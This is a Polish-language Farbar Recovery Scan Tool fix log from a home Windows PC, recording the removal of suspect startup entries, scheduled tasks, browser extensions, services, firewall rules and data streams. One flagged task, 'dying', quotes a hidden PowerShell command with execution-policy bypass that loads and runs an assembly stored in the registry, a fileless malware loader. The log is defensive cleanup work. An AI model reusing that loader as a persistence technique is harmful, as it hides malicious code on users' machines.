Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 18-03-2023 Uruchomiony przez Krzysztof (19-03-2023 23:38:15) Run:1 Uruchomiony z C:\Users\Krzysztof\Downloads Załadowane profile: Krzysztof Tryb startu: Normal ============================================== fixlist - zawartość: ***************** ̩CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-367471416-2701778136-2344420234-1001\...\Run: [GalaxyClient] => [X] HKU\S-1-5-21-367471416-2701778136-2344420234-1001\...\Run: [utweb] => C:\Users\Krzysztof\AppData\Roaming\uTorrent Web\utweb.exe [6418944 2023-02-13] (BitTorrent Inc -> BitTorrent Inc.) HKU\S-1-5-21-367471416-2701778136-2344420234-1001\...\Run: [Opera Browser Assistant] => C:\Users\Krzysztof\AppData\Local\Programs\Opera\assistant\browser_assistant.exe [4140448 2023-03-08] (Opera Norway AS -> Opera Software) HKU\S-1-5-21-367471416-2701778136-2344420234-1001\...\Winlogon: [Shell] explorer.exe, <==== UWAGA HKLM\SOFTWARE\Policies\Mozilla\Firefox: Ograniczenia <==== UWAGA Task: {114F86E1-F8D1-4901-9D77-F74598212E5C} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [2295192 2023-02-01] (Avast Software s.r.o. -> Avast Software) Task: {262C7583-96E1-4F92-86CD-83967659AD07} - System32\Tasks\Opera GX scheduled Autoupdate 1581895553 => C:\Users\Krzysztof\AppData\Local\Programs\Opera GX\launcher.exe [2571208 2023-03-01] (Opera Norway AS -> Opera Software) Task: {331752D7-480A-4CC3-BBB6-AB473B099947} - System32\Tasks\dying => powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load((Get-ItemProperty HKCU:\Software\dying\).dying).EntryPoint.Invoke($Null,$Null) <==== UWAGA Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe [45056 2013-08-22] (Microsoft Corporation) [Brak podpisu cyfrowego] Task: {3B6CF455-D05C-4F13-81BF-88AB51C02F9F} - System32\Tasks\Opera scheduled Autoupdate 1576165004 => C:\Users\Krzysztof\AppData\Local\Programs\Opera\launcher.exe [2701216 2023-03-08] (Opera Norway AS -> Opera Software) Task: {3C8C4D26-E1CF-4162-840D-440F99081024} - System32\Tasks\e-pity2019a_kwiecien => C:\Program Files (x86)\e-file\e-pity\Assets\signxml.exe [35328 2023-02-24] (e-file sp. z o.o. sp. k.) [Brak podpisu cyfrowego] Task: {448A0C18-6072-4C45-8959-08357F4493BA} - System32\Tasks\Opera scheduled assistant Autoupdate 1582737326 => C:\Users\Krzysztof\AppData\Local\Programs\Opera\launcher.exe [2701216 2023-03-08] (Opera Norway AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\Krzysztof\AppData\Local\Programs\Opera\assistant" $(Arg0) Task: {5926305B-CFD0-4194-BBD2-6206808BFA84} - System32\Tasks\Microsoft\Windows\Shell\FamilySafetyUpload => {EBF00FCB-0769-4B81-9BEC-6C05514111AA} Task: {6DFCB649-0769-4F83-BB10-F60F235F6D3D} - System32\Tasks\Microsoft\Windows\SkyDrive\Idle Sync Maintenance Task => {BF6C1E47-86EC-4194-9CE5-13C15DCB2001} Task: {872D0E53-FD2E-41E3-B431-698AF82882CE} - System32\Tasks\Microsoft\Windows\SkyDrive\Routine Maintenance Task => {1B1F472E-3221-4826-97DB-2C2324D389AE} Task: {A58300D5-F054-4813-B296-0C8A978EE7E1} - System32\Tasks\e-pity2019_styczen => C:\Program Files (x86)\e-file\e-pity\Assets\signxml.exe [35328 2023-02-24] (e-file sp. z o.o. sp. k.) [Brak podpisu cyfrowego] Task: {C1FDD627-3B9A-4A97-A56D-B58277951F9E} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1615889821 => C:\Users\Krzysztof\AppData\Local\Programs\Opera GX\launcher.exe [2571208 2023-03-01] (Opera Norway AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\Krzysztof\AppData\Local\Programs\Opera GX\assistant" $(Arg0) Task: {CE2DE968-E342-40D7-9566-427D45E4A886} - System32\Tasks\Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor => {EA9155A3-8A39-40B4-8963-D3C761B18371} Tcpip\Parameters: [DhcpNameServer] 62.21.99.94 62.21.99.95 Tcpip\..\Interfaces\{9F1C569D-369F-4111-9B30-34BEDDD5A420}: [NameServer] 8.8.8.8,8.8.4.4 Tcpip\..\Interfaces\{9F1C569D-369F-4111-9B30-34BEDDD5A420}: [DhcpNameServer] 62.21.99.94 62.21.99.95 Edge Extension: (Brak nazwy) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [nie znaleziono] Edge Extension: (Brak nazwy) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [nie znaleziono] Edge Extension: (Brak nazwy) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [nie znaleziono] Edge Extension: (Brak nazwy) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [nie znaleziono] Edge HKLM\...\Edge\Extension: [bojobppfploabceghnmlahpoonbcbacn] Edge HKLM-x32\...\Edge\Extension: [bojobppfploabceghnmlahpoonbcbacn] CHR HKLM\...\Chrome\Extension: [ihcjicgdanjaechkgeegckofjjedodee] CHR HKLM-x32\...\Chrome\Extension: [ihcjicgdanjaechkgeegckofjjedodee] CHR HKLM-x32\...\Chrome\Extension: [ofoeigeaodhbjogdigckajfhjbonaofg] S3 mracsvc; C:\Windows\System32\mracsvc.exe [X] S4 uhssvc; "C:\Program Files\Microsoft Update Health Tools\uhssvc.exe" [X] S3 mracdrv; C:\WINDOWS\System32\drivers\mracdrv1.sys [19767024 2020-09-13] (Mail.Ru LLC -> LLC Mail.Ru) S4 NVHDA; \SystemRoot\system32\drivers\nvhda64v.sys [X] C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk C:\Users\Krzysztof\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wargaming.net\World_of_Warships_EU\Odinstaluj World_of_Warships_EU.lnk C:\Users\Krzysztof\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk C:\Users\Krzysztof\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk C:\Users\Krzysztof\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk C:\Users\Krzysztof\AppData\Roaming\Opera Software\Opera Stable\Extensions\kbmoiomgmchbpihhdpabemajcbjpcijk 2023-03-19 03:24 - 2023-03-19 03:24 - 000000000 ____D C:\Users\Krzysztof\Downloads\FRST-OlderVersion 2023-03-19 03:14 - 2020-05-23 06:26 - 000000000 ____D C:\Users\Krzysztof\AppData\Roaming\uTorrent Web 2023-03-19 03:14 - 2020-05-23 06:26 - 000000000 ____D C:\Users\Krzysztof\AppData\Local\BitTorrentHelper 2023-03-19 00:00 - 2022-03-02 22:12 - 000000000 ____D C:\ProgramData\GridinSoft 2023-03-18 17:10 - 2022-03-12 03:56 - 000001940 _____ C:\Users\Krzysztof\Desktop\uTorrent Web.lnk 2023-03-18 17:10 - 2022-03-12 03:56 - 000001926 _____ C:\Users\Krzysztof\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\uTorrent Web.lnk CustomCLSID: HKU\S-1-5-21-367471416-2701778136-2344420234-1001_Classes\CLSID\{F0D5B8DF-FA50-4AC1-B644-6DD3DABA2DC0}\InprocServer32 -> 42494E41525953545245414D0300000003000000591248CE8BE38A631FB24E0033D1BD35475DB327E7A9CAA293834BF04FC6 => Brak pliku ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku C:\Users\Krzysztof\Desktop\(64х)American Truck Simulator.lnk AlternateDataStreams: C:\ProgramData:err [1558] AlternateDataStreams: C:\WINDOWS\tracing:? [16] AlternateDataStreams: C:\Users\All Users:err [1558] AlternateDataStreams: C:\ProgramData\Dane aplikacji:err [1558] AlternateDataStreams: C:\Users\Krzysztof\Dane aplikacji:671890e017d8a4fb26004192461213ff [394] AlternateDataStreams: C:\Users\Krzysztof\AppData\Roaming:671890e017d8a4fb26004192461213ff [394] AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [490] SearchScopes: HKU\S-1-5-21-367471416-2701778136-2344420234-1001 -> DefaultScope {22B1715F-FD64-41DE-AC67-27233CD4DB06} URL = hxxp://www.web-pl.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-367471416-2701778136-2344420234-1001 -> {22B1715F-FD64-41DE-AC67-27233CD4DB06} URL = hxxp://www.web-pl.com/search?q={searchTerms} IE trusted site: HKU\.DEFAULT\...\localhost -> localhost IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com IE trusted site: HKU\S-1-5-21-367471416-2701778136-2344420234-1001\...\localhost -> localhost IE trusted site: HKU\S-1-5-21-367471416-2701778136-2344420234-1001\...\webcompanion.com -> hxxp://webcompanion.com FirewallRules: [{5397EC7F-D0B0-4281-8309-A729F37D7795}] => (Allow) C:\Program Files (x86)\DewVPN\dew_svc.exe => Brak pliku FirewallRules: [{22E99B71-B4D8-479E-B3C8-5664CDBA5E6C}] => (Allow) C:\Program Files (x86)\DewVPN\DewVPN.exe => Brak pliku FirewallRules: [{F778B33D-51ED-4C42-A787-0E367342D4FA}] => (Allow) C:\Program Files (x86)\DewVPN\DewVPNBugReport.exe => Brak pliku FirewallRules: [{E6022ABA-66AC-4320-9514-F76157D04D91}] => (Allow) C:\Program Files (x86)\DewVPN\DewVPNLiveup.exe => Brak pliku FirewallRules: [{E410C121-163C-400F-808D-7BE8CF8389B2}] => (Allow) C:\Program Files (x86)\DewVPN\socket.exe => Brak pliku FirewallRules: [{F61F7F6B-05EA-4DC7-ACC7-19BCE1651712}] => (Allow) C:\Program Files (x86)\DewVPN\tunnle.exe => Brak pliku FirewallRules: [{4AC07750-A94D-43B7-B9DE-0770E0DCA6BB}] => (Allow) C:\Program Files (x86)\DewVPN\helper\Stunnle.exe => Brak pliku FirewallRules: [TCP Query User{AD535A59-7836-40F8-AD7D-C7B25818FBA1}C:\programdata\wargaming.net\gamecenter\wgc.exe] => (Allow) C:\programdata\wargaming.net\gamecenter\wgc.exe => Brak pliku FirewallRules: [UDP Query User{2AA8F6FB-41BB-46E0-B400-BE7816522BCC}C:\programdata\wargaming.net\gamecenter\wgc.exe] => (Allow) C:\programdata\wargaming.net\gamecenter\wgc.exe => Brak pliku FirewallRules: [TCP Query User{5C3F733D-8CC9-4248-A776-C412989C3F4F}D:\dying light\dyinglightgame.exe] => (Allow) D:\dying light\dyinglightgame.exe => Brak pliku FirewallRules: [UDP Query User{1780EEBE-217D-4E90-9D55-6152762CE839}D:\dying light\dyinglightgame.exe] => (Allow) D:\dying light\dyinglightgame.exe => Brak pliku FirewallRules: [TCP Query User{F2A53A20-576A-4922-AA32-07C8F247A8D4}D:\dying light\dyinglightgame-culture=pl.exe] => (Allow) D:\dying light\dyinglightgame-culture=pl.exe => Brak pliku FirewallRules: [UDP Query User{B81C4B5B-BB87-4EE2-A6F9-B67C518ED949}D:\dying light\dyinglightgame-culture=pl.exe] => (Allow) D:\dying light\dyinglightgame-culture=pl.exe => Brak pliku FirewallRules: [TCP Query User{2AC76721-5115-41AE-9FAE-3895B2AB4C60}D:\reddeadredemption2\rdr2.exe] => (Allow) D:\reddeadredemption2\rdr2.exe => Brak pliku FirewallRules: [UDP Query User{F8C14013-8D5A-44B6-984B-04AEB4A99AEE}D:\reddeadredemption2\rdr2.exe] => (Allow) D:\reddeadredemption2\rdr2.exe => Brak pliku FirewallRules: [TCP Query User{99106467-965F-459F-9677-B7F7860E609D}D:\steam\steamapps\common\overprime\overprime\binaries\win64\paragonclient-win64-shipping.exe] => (Allow) D:\steam\steamapps\common\overprime\overprime\binaries\win64\paragonclient-win64-shipping.exe => Brak pliku FirewallRules: [UDP Query User{A760D118-57B4-4632-A822-306432DB0EFF}D:\steam\steamapps\common\overprime\overprime\binaries\win64\paragonclient-win64-shipping.exe] => (Allow) D:\steam\steamapps\common\overprime\overprime\binaries\win64\paragonclient-win64-shipping.exe => Brak pliku CMD: sfc /scannow ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. "HKU\S-1-5-21-367471416-2701778136-2344420234-1001\Software\Microsoft\Windows\CurrentVersion\Run\\GalaxyClient" => pomyślnie usunięto "HKU\S-1-5-21-367471416-2701778136-2344420234-1001\Software\Microsoft\Windows\CurrentVersion\Run\\utweb" => pomyślnie usunięto "HKU\S-1-5-21-367471416-2701778136-2344420234-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Opera Browser Assistant" => pomyślnie usunięto "HKU\S-1-5-21-367471416-2701778136-2344420234-1001\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" => pomyślnie usunięto HKLM\SOFTWARE\Policies\Mozilla => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{114F86E1-F8D1-4901-9D77-F74598212E5C}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{114F86E1-F8D1-4901-9D77-F74598212E5C}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\Avast Software\Overseer => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Avast Software\Overseer" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{262C7583-96E1-4F92-86CD-83967659AD07}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{262C7583-96E1-4F92-86CD-83967659AD07}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\Opera GX scheduled Autoupdate 1581895553 => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Opera GX scheduled Autoupdate 1581895553" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{331752D7-480A-4CC3-BBB6-AB473B099947}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{331752D7-480A-4CC3-BBB6-AB473B099947}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\dying => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\dying" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{352E6CA0-7314-4DF4-89C4-682368D80D57}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{352E6CA0-7314-4DF4-89C4-682368D80D57}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3B6CF455-D05C-4F13-81BF-88AB51C02F9F}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3B6CF455-D05C-4F13-81BF-88AB51C02F9F}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1576165004 => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Opera scheduled Autoupdate 1576165004" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3C8C4D26-E1CF-4162-840D-440F99081024}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3C8C4D26-E1CF-4162-840D-440F99081024}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\e-pity2019a_kwiecien => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\e-pity2019a_kwiecien" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{448A0C18-6072-4C45-8959-08357F4493BA}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{448A0C18-6072-4C45-8959-08357F4493BA}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\Opera scheduled assistant Autoupdate 1582737326 => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Opera scheduled assistant Autoupdate 1582737326" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5926305B-CFD0-4194-BBD2-6206808BFA84}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5926305B-CFD0-4194-BBD2-6206808BFA84}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\Microsoft\Windows\Shell\FamilySafetyUpload => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Shell\FamilySafetyUpload" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6DFCB649-0769-4F83-BB10-F60F235F6D3D}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6DFCB649-0769-4F83-BB10-F60F235F6D3D}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\Microsoft\Windows\SkyDrive\Idle Sync Maintenance Task => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\SkyDrive\Idle Sync Maintenance Task" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{872D0E53-FD2E-41E3-B431-698AF82882CE}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{872D0E53-FD2E-41E3-B431-698AF82882CE}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\Microsoft\Windows\SkyDrive\Routine Maintenance Task => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\SkyDrive\Routine Maintenance Task" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A58300D5-F054-4813-B296-0C8A978EE7E1}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A58300D5-F054-4813-B296-0C8A978EE7E1}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\e-pity2019_styczen => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\e-pity2019_styczen" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C1FDD627-3B9A-4A97-A56D-B58277951F9E}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C1FDD627-3B9A-4A97-A56D-B58277951F9E}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\Opera GX scheduled assistant Autoupdate 1615889821 => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Opera GX scheduled assistant Autoupdate 1615889821" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CE2DE968-E342-40D7-9566-427D45E4A886}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CE2DE968-E342-40D7-9566-427D45E4A886}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor" => pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\DhcpNameServer" => pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{9F1C569D-369F-4111-9B30-34BEDDD5A420}\\NameServer" => pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{9F1C569D-369F-4111-9B30-34BEDDD5A420}\\DhcpNameServer" => pomyślnie usunięto HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => pomyślnie usunięto HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\BookReader_B171F20233094AC88D05A8EF7B9763E8 => pomyślnie usunięto HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => pomyślnie usunięto HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Edge\Extensions\bojobppfploabceghnmlahpoonbcbacn => pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\Microsoft\Edge\Extensions\bojobppfploabceghnmlahpoonbcbacn => pomyślnie usunięto HKLM\SOFTWARE\Google\Chrome\Extensions\ihcjicgdanjaechkgeegckofjjedodee => pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\ihcjicgdanjaechkgeegckofjjedodee => pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\ofoeigeaodhbjogdigckajfhjbonaofg => pomyślnie usunięto HKLM\System\CurrentControlSet\Services\mracsvc => pomyślnie usunięto mracsvc => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\uhssvc => pomyślnie usunięto uhssvc => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\mracdrv => pomyślnie usunięto mracdrv => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\NVHDA => pomyślnie usunięto NVHDA => serwis pomyślnie usunięto C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk => pomyślnie przeniesiono C:\Users\Krzysztof\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wargaming.net\World_of_Warships_EU\Odinstaluj World_of_Warships_EU.lnk => pomyślnie przeniesiono C:\Users\Krzysztof\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk => pomyślnie przeniesiono C:\Users\Krzysztof\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk => pomyślnie przeniesiono C:\Users\Krzysztof\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk => pomyślnie przeniesiono C:\Users\Krzysztof\AppData\Roaming\Opera Software\Opera Stable\Extensions\kbmoiomgmchbpihhdpabemajcbjpcijk => pomyślnie przeniesiono C:\Users\Krzysztof\Downloads\FRST-OlderVersion => pomyślnie przeniesiono "C:\Users\Krzysztof\AppData\Roaming\uTorrent Web" => nie znaleziono C:\Users\Krzysztof\AppData\Local\BitTorrentHelper => pomyślnie przeniesiono C:\ProgramData\GridinSoft => pomyślnie przeniesiono "C:\Users\Krzysztof\Desktop\uTorrent Web.lnk" => nie znaleziono C:\Users\Krzysztof\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\uTorrent Web.lnk => pomyślnie przeniesiono HKU\S-1-5-21-367471416-2701778136-2344420234-1001_Classes\CLSID\{F0D5B8DF-FA50-4AC1-B644-6DD3DABA2DC0} => pomyślnie usunięto HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => pomyślnie usunięto C:\Users\Krzysztof\Desktop\(64х)American Truck Simulator.lnk => pomyślnie przeniesiono C:\ProgramData => ":err" ADS pomyślnie usunięto C:\WINDOWS\tracing => ":?" ADS pomyślnie usunięto "C:\Users\All Users" => ":err" ADS nie znaleziono. "C:\ProgramData\Dane aplikacji" => ":err" ADS nie znaleziono. C:\Users\Krzysztof\Dane aplikacji => ":671890e017d8a4fb26004192461213ff" ADS pomyślnie usunięto "C:\Users\Krzysztof\AppData\Roaming" => ":671890e017d8a4fb26004192461213ff" ADS nie znaleziono. C:\Users\Public\Shared Files => ":VersionCache" ADS pomyślnie usunięto "HKU\S-1-5-21-367471416-2701778136-2344420234-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => pomyślnie usunięto HKU\S-1-5-21-367471416-2701778136-2344420234-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{22B1715F-FD64-41DE-AC67-27233CD4DB06} => pomyślnie usunięto HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\localhost => pomyślnie usunięto HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com => pomyślnie usunięto HKU\S-1-5-21-367471416-2701778136-2344420234-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\localhost => pomyślnie usunięto HKU\S-1-5-21-367471416-2701778136-2344420234-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5397EC7F-D0B0-4281-8309-A729F37D7795}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{22E99B71-B4D8-479E-B3C8-5664CDBA5E6C}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F778B33D-51ED-4C42-A787-0E367342D4FA}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E6022ABA-66AC-4320-9514-F76157D04D91}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E410C121-163C-400F-808D-7BE8CF8389B2}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F61F7F6B-05EA-4DC7-ACC7-19BCE1651712}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{4AC07750-A94D-43B7-B9DE-0770E0DCA6BB}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{AD535A59-7836-40F8-AD7D-C7B25818FBA1}C:\programdata\wargaming.net\gamecenter\wgc.exe" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{2AA8F6FB-41BB-46E0-B400-BE7816522BCC}C:\programdata\wargaming.net\gamecenter\wgc.exe" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{5C3F733D-8CC9-4248-A776-C412989C3F4F}D:\dying light\dyinglightgame.exe" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{1780EEBE-217D-4E90-9D55-6152762CE839}D:\dying light\dyinglightgame.exe" => pomyślnie usunięto 